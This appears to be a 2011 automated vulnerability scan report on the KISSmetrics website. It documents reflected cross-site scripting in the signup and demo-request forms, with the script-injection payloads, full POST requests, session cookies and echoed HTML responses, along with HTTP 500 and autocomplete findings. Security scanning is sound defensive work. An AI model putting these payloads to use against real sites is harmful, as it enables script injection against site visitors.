<!DOCTYPE html><html> <head> <title>Sign up for KISSmetrics - 30 day free trial</title> <!-- Meta --> <meta charset="utf-8" /> <meta name="description" content="Experience the most powerful Web Analytics. There’s no risk, no obligation and no credit card required. You can cancel your account at any time." /> <!-- favicon --> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="apple-touch-icon-precomposed" href="/apple-icon.png" /> <!-- Stylesheets --> <link rel="stylesheet" href="/stylesheets/external/shell.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Rokkitt"> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Maven+Pro:regular,500"> <!--[if IE 8]> <link rel="stylesheet" href="/stylesheets/external/ie8.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if lte IE 7]> <link rel="stylesheet" href="/stylesheets/external/lteie7.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if IE]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link rel="stylesheet" href="/stylesheets/external/signup.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="/stylesheets/external/concentrate.css?r=1669" type="text/css" media="all" charset="utf-8" /> <!-- KISSinsights for kissmetrics.com --><script type="text/javascript">var _kiq = _kiq || [];</script><script type="text/javascript" src="//s3.amazonaws.com/j.kissinsights.com/u/3/4b8778f587d05403532596fb20aec271c5ac37bd.js" async="true"></script><!-- KISSmetrics for kissmetrics.com --><script type="text/javascript"> var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } 
_kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/e4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3.1.js');</script> </head> <body> <header> <div class="inner"> <div class="sm_btns"> <a href="/login" id="sign_in_btn" title="Please sign in"><img src="/images/external/sign_in_icon.png" height="8" width="9" alt="Sign in icon" /><span>Sign in</span></a> </div><!-- /.sm_btns --> <a href="/about/work#listings" id="hire_btn" title="We're hiring. Click here to learn more."><img src="/images/external/in_icon.png" height="9" width="9" alt="" /><span>We&rsquo;re hiring</span></a> <a href="/" id="km_logo" title="Back to the home page"><img src="/images/external/km_logo.png" height="33" width="250" alt="KISSmetrics logo" /></a> <nav> <ul> <li class="what_nav"><a href="/what" title="Learn more about KISSmetrics">What is KISSmetrics?</a></li> <li class="about_nav" title="Learn more about our team"><a href="/about">About us</a></li> <li class="trial_nav active"><a href="/signup/pricing" class="Get a free trial of KISSmetrics">Start your free trial</a></li> </ul> </nav> <div class="title"> <h1>Sign up<span class="colon">:</span> <small>Start your free 30 day trial now</small></h1> <p class="call">Call us at <strong>+1 (888) 767-5477</strong> to have a chat.</p></div><!-- /.title --><hr /><ul class="sub_nav"> <li class="trial_sub_nav active"> <a href="/signup"><strong>Start your free 30 day trial</strong><br />No risk, no obligation, no credit card required.</a> </li> <li class="pricing_sub_nav"> <a href="/signup/pricing"><strong>Pricing options</strong><br />Flexible month to month pricing plans.</a> </li> <li class="enterprise_sub_nav"> <a href="/signup/enterprise"><strong>Request a demo</strong><br />To see how it works, let&rsquo;s talk.</a> </li></ul> </div><!-- /.inner --> </header> <section id="main"> <div class="inner"> <div class="title"> <h2>Start your free 30 day trial</h2> <p>There&rsquo;s no risk, no obligation and no credit card required. 
- /signup

/signup

https://www.kissmetrics.com/signup

Parameters

Parameter Type Value
trp POST 30
account%5Bmeta%5D%5Bname%5D POST Smith
account%5Bname%5D POST Smith
account%5Bmeta%5D%5Burl%5D POST '"--></style></script><script>alert(0x0004E9)</script>
user%5Blogin%5D POST 3
account%5Bmeta%5D%5Bphone%5D POST 3
user%5Bnew_password%5D POST 3

Request

POST /signup HTTP/1.1
Referer: https://www.kissmetrics.com/signup/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kissmetrics.com
Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c
Content-Length: 251
Expect: 100-continue
Accept-Encoding: gzip, deflate

trp=30&account%5Bmeta%5D%5Bname%5D=Smith&account%5Bname%5D=Smith&account%5Bmeta%5D%5Burl%5D='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0004E9)%3c%2fscript%3e&user%5Blogin%5D=3&account%5Bmeta%5D%5Bphone%5D=3&user%5Bnew_password%5D=3

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:44:48 GMT
Server: nginx
Set-Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c; path=/
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive


- /signup/enterprise

/signup/enterprise

https://www.kissmetrics.com/signup/enterprise

Parameters

Parameter Type Value
request%5bfirst_name%5d POST Smith
request%5blast_name%5d POST Smith
request%5bcompany%5d POST 3
request%5bcompany_size%5d POST 1 to 5 people
request%5burl%5d POST 3
request%5bemail%5d POST '"--></style></script><script>alert(0x000674)</script>
request%5bphone%5d POST 3

Request

POST /signup/enterprise HTTP/1.1
Referer: https://www.kissmetrics.com/signup/enterprise
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kissmetrics.com
Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c
Content-Length: 266
Expect: 100-continue
Accept-Encoding: gzip, deflate

request%5bfirst_name%5d=Smith&request%5blast_name%5d=Smith&request%5bcompany%5d=3&request%5bcompany_size%5d=1+to+5+people&request%5burl%5d=3&request%5bemail%5d='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000674)%3c%2fscript%3e&request%5bphone%5d=3

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 21:00:26 GMT
Server: nginx
Set-Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c; path=/
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive


- /signup/enterprise

/signup/enterprise

https://www.kissmetrics.com/signup/enterprise

Parameters

Parameter Type Value
request%5Bfirst_name%5D POST Smith
request%5Blast_name%5D POST Smith
request%5Bcompany%5D POST 3
request%5Burl%5D POST 3
request%5Bemail%5D POST '"--></style></script><script>alert(0x0006BD)</script>
request%5Bphone%5D POST 3

Request

POST /signup/enterprise HTTP/1.1
Referer: https://www.kissmetrics.com/signup/enterprise
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kissmetrics.com
Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c
Content-Length: 226
Expect: 100-continue
Accept-Encoding: gzip, deflate

request%5Bfirst_name%5D=Smith&request%5Blast_name%5D=Smith&request%5Bcompany%5D=3&request%5Burl%5D=3&request%5Bemail%5D='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0006BD)%3c%2fscript%3e&request%5Bphone%5D=3

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 21:01:11 GMT
Server: nginx
Set-Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c; path=/
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive


<!DOCTYPE html><html> <head> <title>Request a Demo - KISSmetrics</title> <!-- Meta --> <meta charset="utf-8" /> <meta name="description" content="" /> <!-- favicon --> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="apple-touch-icon-precomposed" href="/apple-icon.png" /> <!-- Stylesheets --> <link rel="stylesheet" href="/stylesheets/external/shell.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Rokkitt"> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Maven+Pro:regular,500"> <!--[if IE 8]> <link rel="stylesheet" href="/stylesheets/external/ie8.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if lte IE 7]> <link rel="stylesheet" href="/stylesheets/external/lteie7.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if IE]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link rel="stylesheet" href="/stylesheets/external/signup.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="/stylesheets/external/concentrate.css?r=1669" type="text/css" media="all" charset="utf-8" /> <!-- KISSinsights for kissmetrics.com --><script type="text/javascript">var _kiq = _kiq || [];</script><script type="text/javascript" src="//s3.amazonaws.com/j.kissinsights.com/u/3/4b8778f587d05403532596fb20aec271c5ac37bd.js" async="true"></script><!-- KISSmetrics for kissmetrics.com --><script type="text/javascript"> var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/e4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3.1.js');</script> </head> <body> <header> <div class="inner"> <div 
class="sm_btns"> <a href="/login" id="sign_in_btn" title="Please sign in"><img src="/images/external/sign_in_icon.png" height="8" width="9" alt="Sign in icon" /><span>Sign in</span></a> </div><!-- /.sm_btns --> <a href="/about/work#listings" id="hire_btn" title="We're hiring. Click here to learn more."><img src="/images/external/in_icon.png" height="9" width="9" alt="" /><span>We&rsquo;re hiring</span></a> <a href="/" id="km_logo" title="Back to the home page"><img src="/images/external/km_logo.png" height="33" width="250" alt="KISSmetrics logo" /></a> <nav> <ul> <li class="what_nav"><a href="/what" title="Learn more about KISSmetrics">What is KISSmetrics?</a></li> <li class="about_nav" title="Learn more about our team"><a href="/about">About us</a></li> <li class="trial_nav active"><a href="/signup/pricing" class="Get a free trial of KISSmetrics">Start your free trial</a></li> </ul> </nav> <div class="title"> <h1>Sign up<span class="colon">:</span> <small>Start your free 30 day trial now</small></h1> <p class="call">Call us at <strong>+1 (888) 767-5477</strong> to have a chat.</p></div><!-- /.title --><hr /><ul class="sub_nav"> <li class="trial_sub_nav"> <a href="/signup"><strong>Start your free 30 day trial</strong><br />No risk, no obligation, no credit card required.</a> </li> <li class="pricing_sub_nav"> <a href="/signup/pricing"><strong>Pricing options</strong><br />Flexible month to month pricing plans.</a> </li> <li class="enterprise_sub_nav active"> <a href="/signup/enterprise"><strong>Request a demo</strong><br />To see how it works, let&rsquo;s talk.</a> </li></ul> </div><!-- /.inner --> </header> <section id="main"> <div class="inner"> <div class="title"> <h2>Request a Demo</h2> <p>Want to see what KISSmetrics can do for you? 
Fill out the form below and we&rsquo;ll get back to you to schedule a demo.</p></div><!-- /.title --><div class="trial col"> <!--<h3>Improve your conversion rate and increase your revenue&hellip;starting now.</h3> <p>KISSmetrics is focused in improving the metrics that really matter to your business.</p>--> <form action="/signup/enterprise" method="post" id="enterprise_signup_form"> <h3>KISSmetrics demo request</h3> <p>Enter your information below and one of our KISSmetrics team members will contact you.</p> <hr class="thin" /> <fieldset> <p class="half"> <label for="request[first_name]">First name:</label> <input type="text" class="text" name="request[first_name]" value="Smith" /> </p> <p class="half"> <label for="request[last_name]">Last name:</label> <input type="text" class="text" name="request[last_name]" value="Smith" /> </p> <p class="clear half"> <label for="request[company]">Company:</label> <input type="text" class="text" name="request[company]" value="3" /> </p> <p class="half"> <label for="request[company_size]">Company size:</label> <select name="request[company_size]"><option value="1 to 5 people">1 to 5 people</option><option value="6 to 10 people">6 to 10 people</option><option value="11 to 25 people">11 to 25 people</option><option value="26 to 50 people">26 to 50 people</option><option value="51 to 200 people">51 to 200 people</option><option value="201 or more people">201 or more people</option></select> </p> <p class="clear"> <label for="request[url]">Company website:</label> <input type="text" class="text" name="request[url]" value="3" /> </p> <p class="half"> <label for="email">Email address:</label> <input type="text" class="text" name="request[email]" value="'"--></style></script><script>netsparker(0x0006BD)</script>" /> <span class="error">Email does not appear to be valid</span> </p> <p class="half"> <label for="phone">Telephone number:</label> <input type="text" class="text" name="request[phone]" value="3" /> </p> <div 
style="visibility:none;overflow:hidden;height:0;width:0;"><input type="submit" value="Submit" /></div> <p class="clear"> <a href="#" onclick="if(!this.submitted){this.submitted=true;$('#enterprise_signup_form').submit();} return false" class="blue button with_arrow">Let&rsquo;s talk</a> </p> </fieldset> </form> </div><!-- /.col --><div class="trial col side"> <p>We&rsquo;ve got a bunch of really smart customers, who are using KISSmetrics to get even smarter.</p></div><!-- /.trial.col.side --><!--<hr /><ul class="faq"> <li> <h3>How does the 30-day free trial work?</h3> <p>There&rsquo;s no risk, no obligation and no credit card required. You can cancel your account at any time by simply clicking on the &ldquo;account settings&rdquo; link on your dashboard.</p> </li> <li> <h3>What if I go over my plan limits?</h3> <p>During the 30-day free trial there are no overage fees. After the 30-day trial is over you will not be charged any overage fees for the first month that you go over. You can upgrade to a higher plan and you will be charged for that plan starting with the next billing cycle.</p> </li> <li> <h3>Can I change plans at any time?</h3> <p>Changing plans is really simple. You can upgrade or downgrade your plan at any time. If you are upgrading to a higher plan, you will be upgraded immediately but not be charged until the next billing cycle.</p> </li> <li> <h3>Is there a minimum commitment?</h3> <p>KISSmetrics is a month to month service. There is no contract or long term obligation. You are billed on a monthly basis, and if you cancel you will not be billed again.</p> </li> <li> <h3>What are my payment options?</h3> <p>We accept Visa, Mastercard, American Express and Discover through our online payment system. If you would like to prepay for 12 months you can pay with an invoice. 
Please contact us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a> for more information.</p> </li> <li> <h3>Where can I review the terms of service and privacy policy?</h3> <p>Here are our <a href="/terms">Terms of Service</a> and <a href="/privacy">Privacy Policy</a>.</p> </li></ul>--><br style="clear:both;" /> </div><!-- /.inner --> </section> <footer> <section class="more"> <div class="inner"> <p>KISSmetrics on the web: &nbsp;<a href="http://twitter.com/#!/kissmetrics" target="_new" class="twitter" title="Follow us on Twitter">Twitter</a> <a href="http://www.facebook.com/KISSmetrics" target="_new" class="facebook" title="Join us on Facebook">Facebook</a> <a href="http://kissmetrics.tumblr.com" target="_new" class="tumblr" title="Follow us on Tumblr">Tumblr</a> <a href="http://blog.kissmetrics.com" target="_new" class="blog" title="Visit the KISSmetrics Marketing Blog">Blog</a></p> <nav> <ul> <li><a href="http://blog.kissmetrics.com" target="_new" title="Visit the KISSmetrics Marketing Blog">Blog</a></li> <li><a href="/contact" title="Contact us">Contact</a></li> <li><a href="http://support.kissmetrics.com" target="_new" title="Visit our support site">Help</a></li> <li><a href="/terms" title="Terms of Use">Terms of Use</a></li> <li><a href="/privacy" title="Privacy Policy">Privacy Policy</a></li> <!--<li><a href="/security">Security</a></li>--> </ul> </nav> </div> </section> <section class="about cf"> <div class="inner"> <div class="col detail"> <h3>What is KISSmetrics?</h3> <p>Use KISSmetrics to increase purchases on your website by visualizing your online sales funnels and figuring out which campaigns are driving revenue and which ones aren&rsquo;t. <a href="/what">Learn more about how we can help you</a>.</p> <h3>Want to have a chat? 
Call us at <strong>+1 (888) 767-5477</strong></h3> <p>or email us at <a href="mailto:support@kissmetrics.com">support@kissmetrics.com</a>.</p> </div><!-- /.col --> <div class="col gdd"> <h3>We also provide free tools to help you get started on your path to becoming data driven</h3> <p><img src="/images/external/get_data_driven.png" height="52" width="187" alt="Get Data Driven" />Ever wonder how much revenue you could gain with a 5% improvement on your conversion rate? At KISSmetrics, we are working on giving you the tools to start driving your decisions with data. <a href="http://getdatadriven.com/" target="_new">Get Data Driven, subscribe to our weekly email newsletter</a>.</p> <!--<h3>Overheard on Twitter</h3> <ul class="overheard"> <li> <strong class="by"><a href="#">6 hours ago by Melody McCloskey</a></strong> <br /> Deep dive into KISSmetrics to measure our funnels/user paths, so far I’m impressed! </li> <li> <strong class="by"><a href="#">23 hours ago by gabyingreen</a></strong> <br /> I just love Inforgraphics! Check out this infographic by @KISSmetrics showing @Twitter&rsquo;s growth statistics <a href="#">http://kiss.ly/esKzFU</a> #measure </li> </ul>--> </div><!-- /.col --> </div><!-- /.inner --> </section> <div class="inner"> <p class="copyright">&copy; Copyright 2011 KISSmetrics. 
All rights reserved.</p> <a href="/signup" class="teal button with_arrow" title="Get started with KISSmetrics today!">Get started with KISSmetrics today!</a> </div><!-- /.inner --> </footer> <div id="signin_modal" style="display: none"> <div class="modal"> <div class="modal-inner" id="signin_content"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Sign into KISSmetrics</h3> </div> <div class="content"> <form action="/login" id="signin_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> </p> <p> <label for="email">Password:</label> <input type="password" class="text" name="password" id="password" /><br /> <span class="forgot"><a href="#">Forgot password?</a></span> </p> <p class="buttons"><a href="#" onclick="$('#signin_form').submit(); return false;" class="blue button with_arrow">Sign in</a> <input type="checkbox" name="remember_me" value="1" checked="checked" /> Keep me signed in for two weeks</p> </form> </div> </div> <div class="modal-inner" id="forgot_content" style="display:none;"> <div class="title"> <a href="#" class="close_modal"></a> <h3>Forgot your password?</h3> </div> <div class="content"> <p>Enter your email address below and we&rsquo;ll send you instructions.</p> <hr /> <form action="/forgot_password" id="forgot_form" method="POST"> <p> <label for="email">Email Address:</label> <input class="text" name="login" value="" id="email" type="text"/> </p> <p class="buttons"><a href="#" onclick="$('#forgot_form').submit(); return false;" class="blue button with_arrow">Recover password</a> </form> </div> </div> </div> </div> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script> <script src="/javascript/external.1669.js" type="text/javascript"></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." ..
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The server responded with an HTTP status 500. This indicates a server-side error; the reasons may vary, and the behaviour should be analysed carefully. If Netsparker is able to find a security issue in the same resource, it reports it as a separate vulnerability.

Impact

The impact varies with the underlying condition. Generally a 500 response indicates poor coding practices: insufficient error checking, sanitization and whitelisting. However, there may be a bigger issue, such as SQL injection; if so, Netsparker checks for other possible issues and reports them separately.

Remedy

Analyse this issue and review the application code so that unexpected errors are handled. This should be a generic practice: the application must not disclose further information upon an error, and all errors should be handled server-side only.
- /signup

/signup CONFIRMED

https://www.kissmetrics.com/signup

Request

POST /signup HTTP/1.1
Referer: https://www.kissmetrics.com/signup/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kissmetrics.com
Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c
Content-Length: 41
Expect: 100-continue
Accept-Encoding: gzip, deflate

account[meta][company_size]=1+to+5+people

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:37:43 GMT
Server: nginx
Set-Cookie: sid=BAh7BzoJaWFkbTA6DHVzZXJfaWQiAA%3D%3D%0A--1267e13725ca10c7c23448c3acb85f967b0ad60c; path=/
Content-Length: 1152
Connection: keep-alive


<!DOCTYPE html><html> <head> <title>Server Error (500) - KISSmetrics</title> <meta charset="utf-8" /> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="stylesheet" href="/stylesheets/none.css" type="text/css" media="all" charset="utf-8" /> </head> <body> <div class="wrapper"> <div id="error_500"> <span class="ribbon"></span> <h2>Sorry, but there was an error. <strong>(500)</strong></h2> <hr /> <p>If you think this was an error on our part, please <a href="mailto:support@kissmetrics.com">let us know</a>. If not, maybe these links will help you:</p> <ul> <li><a href="/dashboard">Your Dashboard</a></li> <li><a href="/login">Sign-in</a></li> <li><a href="http://support.kissmetrics.com">KISSmetrics support site</a></li> <li><a href="/">KISSmetrics.com Homepage</a></li> </ul> </div> </div> <a href="//www.kissmetrics.com/" id="logo"><img src="/images/logo_sm.png" alt="KISSmetrics logo" title="KISSmetrics" height="22" width="160" /></a> </body></html>
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more form fields. These were either "password" fields or sensitive fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used on shared computers, such as those in cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs that store private data and disable autocomplete on them. Fields that hold data such as "Credit Card" or "CCV" values should not be cached. You can allow the application to cache usernames and remember passwords; however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy, and a number of automated tools exist to do this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /privacy

/privacy CONFIRMED

https://www.kissmetrics.com/privacy

Identified Field Name

login

Request

GET /privacy HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.kissmetrics.com
Cookie: sid=BAh7AA%3D%3D%0A--70094774d7749f1eacc46c288cd1115665bf2553
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Encoding:
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:35:15 GMT
Server: nginx
Set-Cookie: sid=BAh7AA%3D%3D%0A--70094774d7749f1eacc46c288cd1115665bf2553; path=/
Vary: Accept-Encoding
transfer-encoding: chunked
Connection: keep-alive


<!DOCTYPE html><html> <head> <title>KISSmetrics Privacy Policy</title> <!-- Meta --> <meta charset="utf-8" /> <meta name="description" content="" /> <!-- favicon --> <link rel="icon" href="/favicon.ico" /> <link rel="shortcut icon" href="/favicon.ico" /> <link rel="apple-touch-icon-precomposed" href="/apple-icon.png" /> <!-- Stylesheets --> <link rel="stylesheet" href="/stylesheets/external/shell.css?r=1669" type="text/css" media="all" charset="utf-8" /> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Rokkitt"> <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Maven+Pro:regular,500"> <!--[if IE 8]> <link rel="stylesheet" href="/stylesheets/external/ie8.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if lte IE 7]> <link rel="stylesheet" href="/stylesheets/external/lteie7.css?r=1669" type="text/css" media="all" charset="utf-8" /> <![endif]--> <!--[if IE]> <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <!-- KISSinsights for kissmetrics.com --><script type="text/javascript">var _kiq = _kiq || [];</script><script type="text/javascript" src="//s3.amazonaws.com/j.kissinsights.com/u/3/4b8778f587d05403532596fb20aec271c5ac37bd.js" async="true"></script><!-- KISSmetrics for kissmetrics.com --><script type="text/javascript"> var _kmq = _kmq || []; function _kms(u){ setTimeout(function(){ var s = document.createElement('script'); var f = document.getElementsByTagName('script')[0]; s.type = 'text/javascript'; s.async = true; s.src = u; f.parentNode.insertBefore(s, f); }, 1); } _kms('//i.kissmetrics.com/i.js');_kms('//doug1izaerwt3.cloudfront.net/e4756f9bee2a2cfc9c8a4aed3197e68a590c2dc3.1.js');</script> </head> <body> <header> <div class="inner"> <div class="sm_btns"> <a href="/login" id="sign_in_btn" title="Please sign in"><img src="/images/external/sign_in_icon.png" height="8" width="9" alt="Sign in icon" /><span>Sign in</span></a> </div><!-- /.sm_btns --> <a href="/about/work#listings" 
id="hire_btn" title="We're hiring. Click here to learn more."><img src="/images/external/in_icon.png" height="9" width="9" alt="" /><span>We&rsquo;re hiring</span></a> <a href="/" id="km_logo" title="Back to the home page"><img src="/images/external/km_logo.png" height="33" width="250" alt="KISSmetrics logo" /></a> <nav> <ul> <li class="what_nav"><a href="/what" title="Learn more about KISSmetrics">What is KISSmetrics?</a></li> <li class="about_nav" title="Learn more about our team"><a href="/about">About us</a></li> <li class="trial_nav"><a href="/signup/pricing" class="Get a free trial of KISSmetrics">Start your free trial</a></li> </ul> </nav> </div><!-- /.inner --> </header> <section id="main"> <div class="inner"> <div class="wrap"> <h2>KISSmetrics Privacy Policy</h2> <hr /> <p>Space Pencil, Inc., aka KISSmetrics, ("<b>KISSmetrics</b>" or "<b>we</b>" or "<b>our</b>"), makes available a service that enables a website operator to have collected and tracked certain data and information regarding the characteristics and activities of visitors to websites owned or controlled by the website operator or operated by the website operator on behalf of a third party and to view certain analytical reports based on such data and information (the "<b>Service</b>"). A website operator that desires to use the Service must execute a separate online agreement with KISSmetrics (a website operator that executes such an agreement, a "<b>KISSmetrics Customer</b>"). Under such agreement, KISSmetrics grants the KISSmetrics Customer a license to use certain software code that, when installed on a website, collects and track certain data and information regarding the characteristics and activities of visitors to website (collectively, "<b>Website Visitor Data</b>").</p> <p>KISSmetrics provides this Privacy Policy to inform you of our policies and procedures regarding the collection, use and disclosure of personal information that we receive from you. 
This Privacy Policy may be updated from time to time. We will notify you of any material changes by posting the new Privacy Policy on the KISSmetrics website (the "Site"). You are advised to consult this policy regularly for any changes.</p> <p>This Privacy Policy applies only to information that KISSmetrics Customers provide to us during their registration with KISSmetrics as a KISSmetrics Customer and their creation of a KISSmetrics Customer account and in conjunction with their access to and use of the Service. This privacy policy does not apply to any Website Visitor Data that KISSmetrics may collect, obtain or access in connection with operating the Service.</p> <p>As used in this policy, the terms "using" and "processing" information include using cookies on a computer, subjecting the information to statistical or other analysis and using or handling information in any way, including, but not limited to collecting, storing, evaluating, modifying, deleting, using, combining, disclosing and transferring information within our organization or among our affiliates within the United States or internationally.</p> <h3>Information Collection and Use</h3> <p><i>Personally Identifiable Information.</i></p> <ul> <li>When you register with us through the Site, as a KISSmetrics Customer, we will ask you for personally identifiable information. This refers to information about you that can be used to contact or identify you. Personally identifiable information includes, but is not limited to, your name, phone number, credit card or other billing information (if applicable), email address and home and business postal addresses. 
We use your personally identifiable information mainly to provide the Service and administer your inquiries.</li> <li>We also collect other non-identifying information that you provide as part of registration (e.g., without limitation, zip code (on its own) and individual preferences).</li> <li>We use your personally identifiable information (in some cases, in conjunction with your non-identifying Information) mainly to provide the Service, complete your transactions, and administer your inquiries.</li> <li>Certain non-identifying Information would be considered a part of your personally identifiable information if it were combined with other identifiers (for example, combining your zip code with your street address) in a way that enables you to be identified. But the same pieces of information are considered non-identifying Information when they are taken alone or combined only with other non-identifying information (for example, your viewing preferences). We may combine your personally identifiable information with non-identifying Information and aggregate it with information collected from other KISSmetrics Users (defined below) to attempt to provide you with a better experience, to improve the quality and value of the Service and to analyze and understand how our Site and Service are used. We may also use the combined information without aggregating it to serve you specifically, for instance to deliver a product to you according to your preferences or restrictions.</li> <li>We also use your personally identifiable information to contact you with KISSmetrics newsletters, marketing or promotional materials and other information that may be of interest to you. If you decide at any time that you no longer wish to receive such communications from us, please follow the unsubscribe instructions provided in any of the communications or update your "user preferences" information. 
(See "<b>Changing or Deleting Information</b>," below.)</li> </ul> <p><i>Log Data.</i> When you visit the Site, whether as a KISSmetrics Customer or a non-registered user just browsing (any of these, a "<b>KISSmetrics User</b>"), our servers automatically record information that your browser sends whenever you visit a website ("<b>Log Data</b>"). This Log Data may include information such as your computer’s Internet Protocol ("<b>IP</b>") address, browser type or the webpage you were visiting before you came to our Site, pages of our Site that you visit, the time spent on those pages, information you search for on our Site, access times and dates, and other statistics. We use this information to monitor and analyze use of the Site and the Service and for the Site’s technical administration, to increase our Site’s functionality and user-friendliness, and to better tailor it to our visitors’ needs.</p> <h3>Cookies</h3> <p>Like many websites, we use "cookies" to collect information. A cookie is a small data file that we transfer to your computer’s hard disk for record-keeping purposes. We use cookies for two purposes. First, we utilize persistent cookies to save your registration ID and login password for future logins to the Site. Second, we utilize session 